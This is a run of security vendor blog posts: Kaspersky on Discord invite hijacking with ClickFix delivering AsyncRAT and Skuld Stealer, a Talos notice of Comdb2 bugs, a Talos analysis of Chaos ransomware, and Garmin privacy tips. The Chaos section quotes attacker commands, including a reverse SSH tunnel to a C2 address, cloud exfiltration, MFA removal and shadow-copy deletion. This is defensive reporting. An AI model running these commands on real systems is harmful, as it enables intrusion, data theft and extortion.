Attackers are using expired and deleted Discord invite links to distribute two strains of malware: AsyncRAT for taking remote control of infected computers, and Skuld Stealer for stealing crypto wallet data. They do this by exploiting a vulnerability in Discord’s invite link system to stealthily redirect users from trusted sources to malicious servers.

The attack leverages the ClickFix technique, multi-stage loaders and deferred execution to bypass defenses and deliver malware undetected. This post examines in detail how attackers exploit the invite link system, what is ClickFix and why they use it, and, most importantly, how not to fall victim to this scheme.

How Discord invite links work

First, let’s look at how Discord invite links work and how they differ from each other. By doing so, we’ll gain an insight into how the attackers learned to exploit the link creation system in Discord.

Discord invite links are special URLs that users can use to join servers. They are created by administrators to simplify access to communities without having to add members manually. Invite links in Discord can take two alternative formats:

• https://discord.gg/{invite_code}
• https://discord.com/invite/{invite_code}

Having more than one format, with one that uses a “meme” domain, is not the best solution from a security viewpoint, as it sows confusion in the users’ minds. But that’s not all. Discord invite links also have three main types, which differ significantly from each other in terms of properties:

• Temporary invite links
• Permanent invite links
• Custom invite links (vanity URLs)

Links of the first type are what Discord creates by default. Moreover, in the Discord app, the server administrator has a choice of fixed invite expiration times: 30 minutes, 1 hour, 6 hours, 12 hours, 1 day or 7 days (the default option). For links created through the Discord API, a custom expiration time can be set — any value up to 7 days.

Codes for temporary invite links are randomly generated and usually contain 7 or 8 characters, including uppercase and lowercase letters, as well as numbers. Examples of a temporary link:

• https://discord.gg/a7X9pLd
• https://discord.gg/Fq5zW2cn

To create a permanent invite link, the server administrator must manually select Never in the Expire After field. Permanent invite codes consist of 10 random characters — uppercase and lowercase letters, and numbers, as before. Example of a permanent link:

• https://discord.gg/hT9aR2kLmB

Lastly, custom invite links (vanity links) are available only to Discord Level 3 servers. To reach this level, a server must get 14 boosts, which are paid upgrades that community members can buy to unlock special perks. That’s why popular communities with an active audience — servers of bloggers, streamers, gaming clans or public projects — usually attain Level 3.

Custom invite links allow administrators to set their own invite code, which must be unique among all servers. The code can contain lowercase letters, numbers and hyphens, and can be almost arbitrary in length — from 2 to 32 characters. A server can have only one custom link at any given time.

Such links are always permanent — they do not expire as long as the server maintains Level 3 perks. If the server loses this level, its vanity link becomes available for reuse by another server with the required level. Examples of a custom invite link:

• https://discord.gg/alanna-titterington
• https://discord.gg/best-discord-server-ever
• https://discord.gg/fq5zw2cn

From this last example, attentive readers may guess where we’re heading.

How scammers exploit the invite system

Now that we’ve looked at the different types of Discord invite links, let’s see how malicious actors weaponize the mechanism. Note that when a regular, non-custom invite link expires or is deleted, the administrator of a legitimate server cannot get the same code again, since all codes are generated randomly.

But when creating a custom invite link, the server owner can manually enter any available code, including one that matches the code of a previously expired or deleted link.

It is this quirk of the invite system that attackers exploit: they track legitimate expiring codes, then register them as custom links on their servers with Level 3 perks.

As a result, scammers can use:

• Any expired temporary invite links (even if the expired link has capital letters and the scammers’ custom URL replaces them with lowercase, the system automatically redirects the user to this vanity URL)
• Permanent invite links deleted from servers, if the code consisted solely of lowercase letters and numbers (no redirection here)
• Custom invite links, if the original server has lost Level 3 perks and its link is available for re-registration

What does this substitution lead to? Attackers get the ability to direct users who follow links previously posted on wholly legitimate resources (social networks, websites, blogs and forums of various communities) to their own malicious servers on Discord.

What’s more, the legal owners of these resources may not even realize that the old invite links now point to fake Discord servers set up to distribute malware. This means they can’t even warn users that a link is dangerous, or delete messages in which it appears.

How ClickFix works in Discord-based attacks

Now let’s talk about what happens to users who follow hijacked invite links received from trusted sources. After joining the attackers’ Discord server, the user sees that all channels are unavailable to them except one, called verify.

This channel features a bot named Safeguard that offers full access to the server. To get this, the user must click the Verify button, which is followed by a prompt to authorize the bot.

After authorization, the bot gains access to profile information (username, avatar, banner), and the user is redirected to an external site: https://captchaguard[.]me. Next, the user goes through a chain of redirects and ends up on a well-designed web page that mimics the Discord interface, with a Verify button in the center.

Clicking the Verify button activates JavaScript code that copies a malicious PowerShell command to the clipboard. The user is then given precise instructions on how to “pass the check”: open the Run window (Win + R), paste the clipboarded text (Ctrl + C), and click Enter.

The site does not ask the user to download or run any files manually, thereby removing the typical warning signs. Instead, users essentially infect themselves by running a malicious PowerShell command that the site slips onto the clipboard. All these steps are part of an infection tactic called ClickFix, which we’ve already covered in depth on our blog.

AsyncRAT and Skuld Stealer malware

The user-activated PowerShell script is the first step in the multi-stage delivery of the malicious payload. The attackers’ next goal is to install two malicious programs on the victim’s device — let’s take a closer look at each of them.

First, the attackers download a modified version of AsyncRAT to gain remote control over the infected system. This tool provides a wide range of capabilities: executing commands and scripts, intercepting keystrokes, viewing the screen, managing files, and accessing the remote desktop and camera.

Next, the cybercriminals install Skuld Stealer on the victim’s device. This crypto stealer harvests system information, siphons off Discord login credentials and authentication tokens saved in the browser, and, crucially, steals seed phrases and passwords for Exodus and Atomic crypto wallets by injecting malicious code directly into their interface.

Skuld sends all collected data via a Discord webhook — a one-way HTTP channel that allows applications to automatically send messages to Discord channels. This provides a secure way for stealing information directly in Discord without the need for a sophisticated management infrastructure.

As a result, all data — from passwords and authentication tokens to crypto wallet seed phrases — is automatically published in a private channel set up in advance on the attackers’ Discord server. Armed with the seed phrases, the attackers can recover all the private keys of the hijacked wallets and gain full control over all cryptocurrency assets of their victims.

How to avoid falling victim?

Unfortunately, Discord’s invite system lacks transparency and clarity. And this makes it extremely difficult, especially for newbies, to spot the trick before clicking a hijacked link and during the redirection process.

Nevertheless, there are some security measures that, if done properly, should fend off the worst outcome — a malware-infected computer and financial losses:

• Never paste code into the Run window if you don’t know exactly what it does. Doing this is extremely dangerous, and normal sites will never give such an instruction.
• Configure Discord privacy and security by following our detailed guide. This will not guard against hijacked invite links, but will minimize other risks associated with Discord.
• Use a reliable security solution that gives advance warning of danger and prevents the download of malware. It’s best to install it on all devices, but especially on ones where you use crypto wallets and other financial software.

Malicious actors often target Discord to steal cryptocurrency, game accounts and assets, and generally cause misery for users. Check out our posts for more examples of Discord scams:

• Malicious activity in Discord chats
• Cryptoscam in Discord
• Discord cryptoscam: Attack of the clones
• Discord cryptoscam: Revenge of the fraudsters
• Discord cryptoscam: A new hope

Kaspersky official blog – ​Read More

Cisco Talos’ Vulnerability Discovery & Research team recently disclosed five vulnerabilities in Bloomberg Comdb2.  

Comdb2 is an open source, high-availability database developed by Bloomberg. It supports features such as clustering, transactions, snapshots, and isolation. The implementation of the database utilizes optimistic locking for concurrent operation.

The vulnerabilities mentioned in this blog post have been patched by the vendor, all in adherence to Cisco’s third-party vulnerability disclosure policy.    

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.     

Comdb2 vulnerabilities

Discovered by a member of Cisco Talos. 

Three null pointer dereference vulnerabilities exist in Bloomberg Comdb2 8.1. Two vulnerabilities (TALOS-2025-2197 (CVE-2025-36520) and TALOS-2025-2201 (CVE-2025-35966)) are in protocol buffer message handling, which can lead to denial of service. An attacker can simply connect to a database instance over TCP and send the crafted message to trigger this vulnerability. TALOS-2025-2199 (CVE-2025-48498) is in the distributed transaction component. A specially crafted network packet can lead to a denial of service. An attacker can send packets to trigger this vulnerability.

There are also two denial-of-service vulnerabilities:

• TALOS-2025-2198 (CVE-2025-46354) exists in the Distributed Transaction Commit/Abort Operation of Bloomberg Comdb2 8.1. A specially crafted network packet can lead to a denial of service. An attacker can send a malicious packet to trigger this vulnerability.
• TALOS-2025-2200 (CVE-2025-36512) exists in the Bloomberg Comdb2 8.1 database when handling a distributed transaction heartbeat. A specially crafted protocol buffer message can lead to a denial of service. An attacker can simply connect to a database instance over TCP and send the crafted message to trigger this vulnerability.

Cisco Talos Blog – ​Read More

• Cisco Talos Incident Response (Talos IR) recently observed attacks by Chaos, a relatively new ransomware-as-a-service (RaaS) group conducting big-game hunting and double extortion attacks.  
• Chaos RaaS actors initiated low-effort spam flooding, escalating to voice-based social engineering for access, followed by RMM tool abuse for persistent connection and legitimate file-sharing software for data exfiltration. 
• The ransomware utilizes multi-threaded rapid selective encryption, anti-analysis techniques, and targets both local and network resources, maximizing impact while hindering detection and recovery. 
• Talos believes the new Chaos ransomware is unrelated to previous Chaos builder-generated variants, as the group uses the same name to create confusion.  
• Talos assesses with moderate confidence that the new group is likely formed by former members of the BlackSuit (Royal) gang, based on similarities in the ransomware’s encryption methodology, ransom note structure, and the toolset used in the attacks. 

Victimology 

The new Chaos has impacted a wide variety of business verticals and seems to be opportunistic without focusing on any specific verticals. Victims have been predominantly in the U.S. and a fewer in the UK, New Zealand and India according to the actor’s data leak site. 

Who is Chaos? 

Chaos is a relatively new RaaS group that emerged as early as February 2025. The Chaos group is actively promoting their cross-platform ransomware software in the dark web Russian-speaking cybercriminal forum Ransom Anon Market Place (RAMP) and is seeking collaboration with affiliates. They emphasize that the new Chaos ransomware software is compatible with Windows, ESXi, Linux and NAS systems, with features such as individual file encryption keys, rapid encryption speeds and network resource scanning — all with a strong emphasis on high-speed encryption and robust security measures.  

Additionally, the group provides an automated panel for managing targets and communications, which requires a paid entry fee that is refundable upon the first case of payment. They have also clearly stated in their dark web forum post that they explicitly avoid collaborating with BRICS/CIS countries, hospitals and government entities. 

Furthermore, the group is offering an onion URL for potential affiliates to register for an account with the Chaos group and has provided a support email address at “win88@thesecure[.]biz”. 

Talos IR observed that the group has been launching big-game hunting and double extortion attacks. Like other operators in the double extortion space, Chaos also runs a data leak site to disclose the stolen data of victims who fail to meet their ransom demands. 

Chaos encrypts the victim’s environment, uses “.chaos” as the file extension for the encrypted files, and drops the ransom note “readme.chaos[.]txt”. In the ransom note, the actor claims that they attempted to perform security testing in the victim’s environment and were successful in compromising it. They also threaten the victims with the disclosure of their stolen confidential data if they fail to pay the ransom amount. The actor does not leave an initial ransom demand or payment instructions in their ransom note but provides instructions to contact them using an onion URL specific to each victim. 

Talos IR observed that the actor demanded a ransom amount of $300K through the victim communication channel and offered two options. If the victim pays the amount, the actor will provide a decryptor application for targeted environments, along with a detailed report of the penetration test conducted on the victim’s environment. They also assure the victim that the stolen data will not be disclosed and will be permanently deleted, ensuring that they will not conduct repeated attacks. 

If the victim fails to pay the ransom, the actor threatens to disclose their stolen data and conduct a distributed denial-of-service (DDoS) attack on all the victim’s internet-facing services, as well as spread the news of their data breach to competitors and clients. 

The Chaos ransomware actor is a recent and concerning addition to the evolving threat landscape, having shown minimal historical activity before the current wave of intrusions. Importantly, this new Chaos ransomware gang is not connected to the variants produced by the Chaos ransomware builder tool or its developers. To hide their identity, these threat actors have exploited the confusion within the security community regarding the name “Chaos” and its various variants and associated builder tools. This deliberate obfuscation complicates the identification and mitigation of risks posed by this emerging threat. 

Recent attack methodologies and notable TTPs 

During our investigation of Chaos ransomware attacks, the Talos IR team observed several significant, noteworthy TTPs. 

Initial access 

T1078 – Valid Accounts 

T1598.004 – Phishing for Information: Voice Phishing (Vishing) 

The actor has gained initial access to the victim through social engineering, utilizing phishing and voice phishing techniques. The victim was initially flooded with spam emails, encouraging them to contact the threat actor via a telephone call. When the victim reaches out, the threat actor, impersonating IT security representatives, advises the victim to launch a built-in remote assistance tool on their Windows machine, specifically Microsoft Quick Assist, and instructs them to connect to the actor’s session. 

Discovery  

T1016 – System Network Configuration Discovery 

T1482 – Domain Trust Discovery 

T1033 – System Owner/User Discovery 

T1057 – Process Discovery 

T1018 – Remote System Discovery 

T1135 – Network Share Discovery 

Talos IR observed multiple commands executed by the actor in the victim environment to carry out post-compromise discovery and reconnaissance. The actor collects network configuration details, information about the domain controller and trust relationships, logged-in user data, running processes, and performs reverse DNS lookup. 

ipconfig /all  
nltest /dclist  
nltest.exe /domain_trusts  
nltest.exe /dclist:$domain  
nslookup $Internal_IP_address 
net view $Internal_IP /all 
quser.exe  
tasklist.exe   

Execution 

T1059.001 – PowerShellT1059 – Command and Scripting Interpreter 

T1047 – Windows Management Instrumentation  

The actor executed scripts and commands to perform the following actions on the victim machine, preparing the environment to download and execute malicious files and connect to the actor’s command and control (C2) server. 

• The threat actor executes the following PowerShell command to set the working environment on the victim machine. 

powershell.exe -noexit -command Set-Location -literalPath 'C:Users$userDesktop' 

• The actor executes the command on all the compromised machines in the victim’s network to set the Windows delivery optimization for allowing the files to be downloaded from a local server on port 8005 that are greater than 50 MB in size, ensuring the large files are downloaded efficiently from peer servers.  

PowerShell.exe -Nologo -Noninteractive - NoProfile -ExecutionPolicy Bypass; Get-DeliveryOptimizationStatus | where-object {($.Sourceurl -CLike 'hxxp[://]localhost[:]8005*') -AND (($.FileSize -ge '52428800') -or ($.BytesFromPeers -ne '0') -or (($.BytesFromCacheServer -ne '0') -and ($_.BytesFromCacheServer -ne $null)))} | select-object -Property BytesFromHttp, FileId, BytesFromPeers,Status,BytesFromCacheServer,SourceURL | ConvertTo-Xml -as string - NoTypeInformation   

• We also observed that the actor has used “atexec” tool from the Impacket toolkit for remote command execution.  

Persistence  

T1547.001 – Boot or Logon Initialization: Registry Run Keys / Startup Folder   

T1133 – External Remote Services 

Talos IR observed that the actor has installed RMM tools such as AnyDesk, ScreenConnect, OptiTune, Syncro RMM and Splashtop streamer on compromised machines to establish persistent connection to the victim network. 

The actor executed a command to modify the Windows registry setting to hide a user account from the Windows login screen. By configuring this registry setting the user account still exists and can be used to log in using Remote Desktop Protocol (RDP) or runas, without the username being displayed on Welcome or login screen.  

cmd.exe /c reg add HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserlist /v $user_account /t REG_DWORD /d 0 /f   

To secure continuous access to the victim machines, the actor also uses net[.]exe utility to reset the passwords of the enumerated domain user accounts in the victim network. 

net[.]exe user $user_name $password /dom  

Credential access and privilege escalation 

T1555 – Credentials from Password Stores 

Talos IR observed that the threat actor executed an “ldapsearch” command remotely on the victim machine through the reverse SSH tunnel and dumped the user details from the active directory to a text file. The actor is likely attempting to steal the credentials of the privileged accounts in the victim’s active directory using the kerberoasting technique, thereby gaining elevated privilege access in the victim’s environment.  

Defense evasion 

T1036.005 – Masquerading: Match Legitimate Name or Location  

T1027 – Obfuscated Files or Information  

T1562.001 – Impair Defenses: Disable or Modify Tools  

Talos IR observed that the actor deletes the PowerShell event logs on the victim machine to evade the security controls, they also attempted to uninstall security or multifactor authentication application on the victim machine using Windows Management Instrumentation Commands (WMIC).  

cmd.EXE /c wmic product where name=$MFA_application for Windows Logon x64 call uninstall /nointeractive 

Lateral movement  

T1021.001 – Remote Services: Remote Desktop Protocol (RDP)   

T1021.004 – Remote Services: SSH  

T1021.002 – SMB/Windows Admin Shares   

Talos IR found that the actor leveraged an RDP client and Impacket, facilitating the command execution over Server Message Block (SMB) and Windows Management Instrumentation (WMI) to move laterally in the victim’s network.  

mstsc.exe /v:$remote machine hostname 
wmic /node:$host process call create “C:Usersencryptor[.]exe /lkey:"$32-bytekey" /encrypt_step:40 /work_mode:local_network” 

Collection and exfiltration  

T1005 – Data from Local System 

T1567.002 – Exfiltration Over Web Service 

T1036.004 – Masquerading: Masquerade Task or Service 

T1059.003 – Command and Scripting Interpreter: Windows Command Shell 

During our investigation, we found that the actor used GoodSync, a legitimate and widely used file synchronization and backup software, in the attack to extract the data from the victim’s machine. 

The actor has executed a command using a file synchronization or cloud upload tool masquerading as a legitimate Windows executable “wininit[.]exe” to copy data from a network file share to a threat actor-controlled remote cloud storage location.  

The command filters files on the victim machine to include only those files modified within the last year and excludes several file types, possibly to avoid large or sensitive files that may trigger detection, including: Adobe Photoshop documents, 7-Zip compressed archives, Microsoft Outlook files, image and audio files, generic database files, log files, temporary files, Hyper-V virtual hard disk files, Microsoft installer packages, executable files, dynamic-link library files, and disc image files. 

Wininit[.]exe copy --max-age 1y --exclude 
*{psd,7z, mox,pst,FIT, FIL,MOV,mdb,iso,exe,dll,wav,png,db,log,HEIC,dwg,tmp,vhdx,msi} 
[\]FS01[]data cloud1:basket123/data -q --ignore-existing --auto-confirm --multi- 
thread-streams 25 --transfers 15 --b2-disable-checksum -P 

Command and control 

T1071 – Application Layer Protocol: SSH 

T1219 – Remote Access Software  

T1105 – Ingress Tool Transfer  

The actor uses the Windows OpenSSH client to execute a command that establishes a reverse SSH tunnel from the victim machine to the actor’s C2 server with the IP address “45[.]61[.]134[.]36” and the port 443 instead of the default SSH port. The actor also attempted to disable the SSH fingerprint checking by not storing the host key in the “known_hosts” file. We spotted that the actor attempts to set up remote port forwarding, where port 12840 on the remote server is forwarded to port 12840 on the local victim machine. 

C:WINDOWSSystem32OpenSSHssh[.]exe -R :12840 -N 
userconnectnopass@45[.]61[.]134[.]36 -p 443 -o UserKnownHostsFile=/dev/null -o 
StrictHostKeyChecking=no   

Impact  

T1490 – Inhibit System Recovery   

T1486 – Data Encrypted for Impact 

Talos IR observed during investigation the evidence of the encryption command execution in the victim environment. The ransomware performs selective encryption on the targeted files on the victim machines by encrypting specific portions of the files, enhancing the speed of the encryption. It appends “.chaos” file extensions to the encrypted files on the victim machine. 

Chaos Windows encryption command: 

C:Users$filename[.]exe /lkey:"32-byte key" /encrypt_step:40 /work_mode:local_network

Chaos ransomware encryptor analysis 

The new Chaos ransomware represents an encryptor that possesses the ability to encrypt files not only across local resources but also throughout network resources. It employs anti-analysis techniques specifically designed to evade detection, alongside a multi-threaded operation that facilitates rapid encryption. This design is intended for maximum impact on targeted organizations, all while ensuring operational stealth and implementing recovery prevention capabilities.  

Talos found a few samples of Windows version of the Chaos ransomware encryptor, which are 32-bit executables that were compiled in February, March and May 2025, indicating the active operations of the Chaos group. 

In this section we explain the functionalities of the new Chaos ransomware encryptor used to target Windows machines. 

Anti-analysis techniques 

The Chaos ransomware implements a multi-layered anti-analysis technique that systematically identifies and evades a range of debugging tools, virtual machine environments, automated sandboxes and security analysis platforms through window enumeration, process monitoring and timing analysis techniques: 

• Ransomware specifically targets and detects debugging environments by enumerating the window classes and title pattern matching the debugger application window. 
• It detects virtual machine and sandbox environments utilizing both process enumeration and window class detection techniques.  
• It detects various security and monitoring tools used for threat and malware analysis using process enumeration. 

All these detection evasion techniques are implemented in the ransomware by employing hash-based comparisons against precomputed signatures to avoid storing plaintext tool names that could be detected through static analysis, ensuring the malware immediately terminates execution upon detecting any analysis environment to prevent analysis. 

Configuration and initialization 

Following a successful evasion, the ransomware parses command-line configuration parameters provided by the operator during the attack. A sample encryption command is shown below: 

Encryptor[.]exe /lkey:"32-byte key" /encrypt_step:$0-100 /work_mode:$mode /ignorar_arquivos_grandes 

• A 32-byte encryption key (‘lkey’) 
• Target directory path (‘path’) 
• Selective encryption percentage (‘encrypt_step’ defaulting to 30%) 
• Operation mode (‘work_mode’ supporting local, network, or local_network combined operations) 
• Large file handling options (‘ignorar_arquivos_grandes’) 

Simultaneously, the ransomware executes an obfuscated system command that performs shadow copy deletion to prevent file recovery through Windows System Restore. Each character of the command is stored as byte value followed by 0x0E in the binary and is decrypted during execution using the custom algorithm shown in the screenshot. 

 The decrypted volume shadow copy deletion command is shown below: 

cmd.exe /c vssadmin to delete shadows /all 

Encryption algorithm and process  

The ransomware employs hybrid cryptographic techniques utilizing Elliptic Curve Diffie-Hellman (ECDH) with Curve25519 for asymmetric operations and AES-256 for symmetric file encryption.   

In each execution, the ransomware generates a unique ECC key pair using windows CNG (Cryptography Next Generation), with the private key maintained in memory and the public key exported as ECCPUBLICBLOB format. File-specific encryption keys are derived through ECDH key agreement combined with the operator-controlled 32-byte master key and another key (generated for each encryption iteration), ensuring each file receives a unique encryption key.  

Chaos Ransomware handles three different modes of encryption: local, network and local_network (both).  

In local encryption mode, the ransomware is configured to encrypt only the targeted set of files on the infected machine. It initiates its attempts by seeking normal access, and in the event of a failure to gain standard access, it elevates its privileges by modifying the security descriptors, followed by executing token impersonation. It accomplishes this by enumerating system processes such as svchost.exe and explorer.exe, subsequently opening process tokens. Through this method, the ransomware impersonates high-privilege security contexts, effectively bypassing file access restrictions on victim machines. 

 The ransomware performs recursive directory traversal while skipping system-critical folders and files to prevent system instability while targeting user created documents. Folders excluded for encryption by Chaos ransomware on Windows machines include: 

• System folders: Windows, boot, system volume information, perflogs 
• Browser data: Mozilla, google, tor browser 
• Application directories: Appdata, msocache, intel 
• Maintenance folders: $recycle.bin, windows.old, $windows.~ws, $windows.~bt  

Files excluded for encryption by Chaos ransomware on Windows Machine include: 

• Boot files: bootsect.bak, boot.ini, ntldr, bootfont.bin 
• System files: ntuser.dat, autorun.inf, desktop.ini, ntuser.ini, ntuser.dat.log 
• Diagnostic files: diagpkg, diagcab, diagcfg 
• Theme files: msstyles, themepack, deskthemepack, theme 
• Other files: Icns, lock, nomedia and files without file extensions 
• Previously encrypted files: *.chaos extension  

In the network encryption mode, the ransomware performs  network discovery by enumerating local network interfaces, identifying private IP address ranges, generating target lists for all hosts within discovered subnets and connects to discovered machines using SMB, and enumerating and queuing the available network shares for encryption while excluding the administrative shares (ADMIN$, C$ and IPC$). This technique may allow the ransomware to propagate across entire corporate infrastructures, encrypting shared drives, network-attached storage and distributed file systems, significantly amplifying the attack’s impact. 

Chaos ransomware performs selective encryption based on the command line configuration parameter “/encrypt_step” specified by the operator during the attack. It calculates specific file offsets for encryption to optimize the encryption speed with complete file corruption. It appends metadata of 60 bytes containing the public key in ECCPUBLICBLOB format and other encryption parameters such as algorithm identifier, key data size to every encrypted file and renames the file extension with the “.chaos” extension. 

Ransom note deployment and clean-up 

The ransomware decrypts its ransom note message using a custom XOR cipher with a 25-byte key. It allocates 1310 bytes (0x51E) for the decrypted note in the machine memory and employs complex offset calculations to obfuscate the simple XOR operation. The encrypted data is decrypted in 5-byte chunks using a distinct XOR key pattern from the 25-byte key. The decrypted ransom message is written in the file “readme[.]chaos[.]txt”.  

The 25-byte key used for ransom note XOR decryption is: 

e2 80 9a d0 a3 28 65 d1 97 d0 b9 d0 94 09 3e d1 85 d1 86 1d 01 e2 80 b9 e2 

After completing encryption, the ransomware executes cleanup procedures, which include worker threads termination, freeing memory buffers, releasing cryptographic resources, cleaning network connections, closing file handles, and terminating the process, ensuring the proper program termination. 

Chaos TTPs overlap with BlackSuit (Royal) ransomware  

Talos assesses with moderate confidence that the new Chaos ransomware group is either a rebranding of the BlackSuit (Royal) ransomware or operated by some of its former members. This assessment is based on the similarities in TTPs, including encryption commands, the theme and structure of the ransom note, and the use of LOLbins and RMM tools in their attacks. 

Talos IR observed that the Chaos operator utilizes configuration parameters for the encryption process during the attack, including “lkey”, “encrypt_step”, and “work_mode”. This configuration enables the ransomware to selectively encrypt both local and network resources within the victim’s environment. 

Enc.exe /lkey:"" /encrypt_step:40 /work_mode:local_network 
32-byte>

A similar encryption technique usage was seen in earlier Royal and BlackSuit ransomware attacks according to the external security reporting. Although the names of the encryption parameters used seemed different, the action remained the same. 

The table shows the encryption parameters similarities of the new Chaos and BlackSuit (Royal) ransomware. 

Chaos	BlackSuit (Royal)	Purpose
/lkey	-id	32-byte key
/encrypt_step	-ep	Defines the portion / percentage of each targeted file to be encrypted.
/kill_vms	–stopvm	stops virtual machines from running on the target system

The Chaos ransomware ransom note shares a similar theme and structure to Royal/BlackSuit, including a greeting, references to a security test, double extortion messaging, assurances of data confidentiality and an onion URL for contact. 

Additionally, Talos observed the similarities in the techniques employed in the Chaos ransomware attacks with that of the BlackSuit ransomware TTPs, as reported in CISA’s StopRansomware advisory for BlackSuit (Royal) ransomware. 

Coverage  

Ways our customers can detect and block this threat are listed below.  

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.  

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.  

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.  

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.  

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.  

Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles.  Secure Access provides seamless transparent and secure access to the internet, cloud services or private application no matter where your users work.  Please  

contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access.  

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.   

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.   

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.  

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.   

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.  

Snort SIDs for the threats are: 

• Snort2: 65125, 65126 
• Snort3: 301273 

ClamAV detections are also available for this threat: 

• Win.Ransomware.Chaos-10045485-0 

Indicators of compromise (IOCs) 

IOCs for this threat can be found in our GitHub repository here. 

Cisco Talos Blog – ​Read More

Sports smartwatches continue to be a prime target for cybercriminals, offering a wealth of sensitive information about potential victims. We’ve previously discussed how fitness tracking apps collect and share user data: most of them publicly display your workout logs, including precise geolocation, by default.

It turns out that smartwatches continue that lax approach to protecting their owners’ personal data. In late June 2025, all COROS smartwatches were found to have serious vulnerabilities that exposed not only the watches themselves but also user accounts. By exploiting them, malicious actors can gain full access to the data in the victim’s account, intercept sensitive information like notifications, change or factory-reset device settings, and even interrupt workout tracking leading to the loss of all data.

What’s particularly frustrating is that COROS was notified of these issues back in March 2025, yet fixes aren’t expected until the end of the year.

Similar vulnerabilities were discovered in 2022 in devices from arguably one of the most popular manufacturers of sports smartwatches and fitness gadgets, Garmin, although these issues were promptly patched.

In light of these kinds of threats, it’s natural to want to maximize your privacy by properly configuring the security settings in your sports apps. Today, we’ll break down how to protect your data within Garmin Connect and the Connect IQ Store — two online services in one of the most widely used sports gadget ecosystems.

How to find privacy settings in Garmin Connect

The privacy settings are located in different sections of the menu depending on whether you’re using the mobile app or the web version.

In the Garmin Connect mobile app:

1. Open Garmin Connect on your smartphone.
2. Tap the three dots (More section) in the bottom right corner.
3. Select Settings.
4. Locate Profile & Privacy.

In the web version of Garmin Connect:

1. Open the Garmin Connect website in a browser.
2. Click the profile icon in the top right corner.
3. Select Account Settings.
4. Navigate to Privacy Settings.

There, you can adjust the visibility of your profile, activities, and steps, and even decide who can see your badges. For the highest level of privacy, we recommend selecting Only me. This ensures that your personal information, workout stats, and other data are visible only to you.

How to hide your workout locations in Garmin Connect

Revealing your routes is one of the most significant privacy risks. This could allow malicious actors to track you in near real-time.

Analysis of publicly available geodata has repeatedly revealed leaks of highly confidential information — from the locations of secret U.S. military bases exposed by anonymized heatmaps of service members’ activity, to the routes of head-of-state motorcades, pieced together from their bodyguards’ smartwatch tracking data. All this data ended up publicly accessible, not because of a hack, but due to incorrect privacy settings within the app itself, which broadcasts all of the owner’s movements online by default.

These leaks clearly showed that data from wearable sensors can cause a lot of problems for their wearers. Even if you’re not guarding top government officials, training maps can reveal your home address, workplace, and other frequently visited locations.

Garmin’s tactical watch models include a Stealth mode feature, designed specifically for military personnel. In their line of work, a lack of privacy can be a matter of life and death. However, with Garmin Connect, you can set up your own privacy zones for almost every Garmin gadget.

Setting up privacy zones:

1. Open your Garmin Connect profile in a browser (the feature isn’t available in the mobile app).
2. Navigate to Privacy Zones.
3. Tap + Add New Zone.
4. Enter your home address or some other place you want to hide.
5. Set a zone radius — we recommend at least 500 meters.

Garmin’s Privacy Zones are quite similar to a feature Strava introduced back in 2013. They automatically hide the start and end points of your workouts if these fall within a designated area. And even if you share your workout with the whole world, it’ll be impossible to see your exact location — for example, your home.

Just a bit further up in that same section, it’s worth checking out other ways your movement data might be used: for instance, to create heatmaps based on user routes. You can opt out of sharing this kind of data. To understand what each function does and how to adjust it, simply tap Edit directly below it. A description will pop up, explaining what data is collected and how it’s used.

How to change the visibility of past activities in Garmin Connect

Changing your privacy settings won’t retroactively apply to activities you’ve already saved in Garmin Connect. Even if you crank up your privacy to the max right now, all your past recordings will still show up with the visibility settings they had when you first created them. So if you’ve been using Garmin for a while and you’re just now getting around to tweaking your privacy, you’ll want to update your previously saved activities as well.

1. Sign in to the web version of Garmin Connect.
2. Select Account Settings → Privacy Settings.
3. Locate Update Past Activities, select a new level of privacy for all past workouts, and confirm your changes.

How to delete individual activities in Garmin Connect

You can remove specific saved activities so no one can see them.

1. Open the Garmin Connect mobile app.
2. Navigate to More → Activities → All Activities.
3. Select the workout you want to delete.
4. Tap the three dots in the top right corner.
5. Tap Delete Activity.

If you need to wipe all your previously saved activities, and you have a lot of them, it might be easier to delete your old account and create a new one. However, keep in mind that deleting your account will result in the loss of all your workout data and health metrics.

How to monitor connected devices and services in Garmin Connect

Another potential source of personal data leaks comes from devices and services that have access to your Garmin Connect account. If you frequently switch out your sports gadgets, make sure you remove them from your account.

1. Tap the device icon in the top right corner of Garmin Connect.
2. The Devices section will open.
3. Remove any unfamiliar or unused devices by swiping left on them.

Next, check the list of third-party apps that have access to your account:

1. Open Settings.
2. Navigate to Connected Apps, and remove those you no longer use.

How to protect yourself from vulnerabilities in Connect IQ

It’s not just incorrect privacy settings in Garmin Connect that can expose your data. Vulnerabilities in apps and watch faces available through the Connect IQ Store marketplace can also lead to data leaks. In 2022, security researcher Tao Sauvage found that the Connect IQ API developer platform contained 13 vulnerabilities. These could potentially be exploited to bypass permissions and compromise your watch.

Some of these vulnerabilities have been lurking in the Connect IQ API since its very first release back in 2015. Over a hundred models of Garmin devices were at risk, including fitness watches, outdoor navigators, and cycling computers. Fortunately, these vulnerabilities were patched in 2023, but if you haven’t updated your device since before then (or you purchased a used gadget), it’s crucial to update its firmware to the latest version.

Even though these specific vulnerabilities have been fixed, the Connect IQ Store remains a potential entry point for future threats. Because of this, we recommend the following:

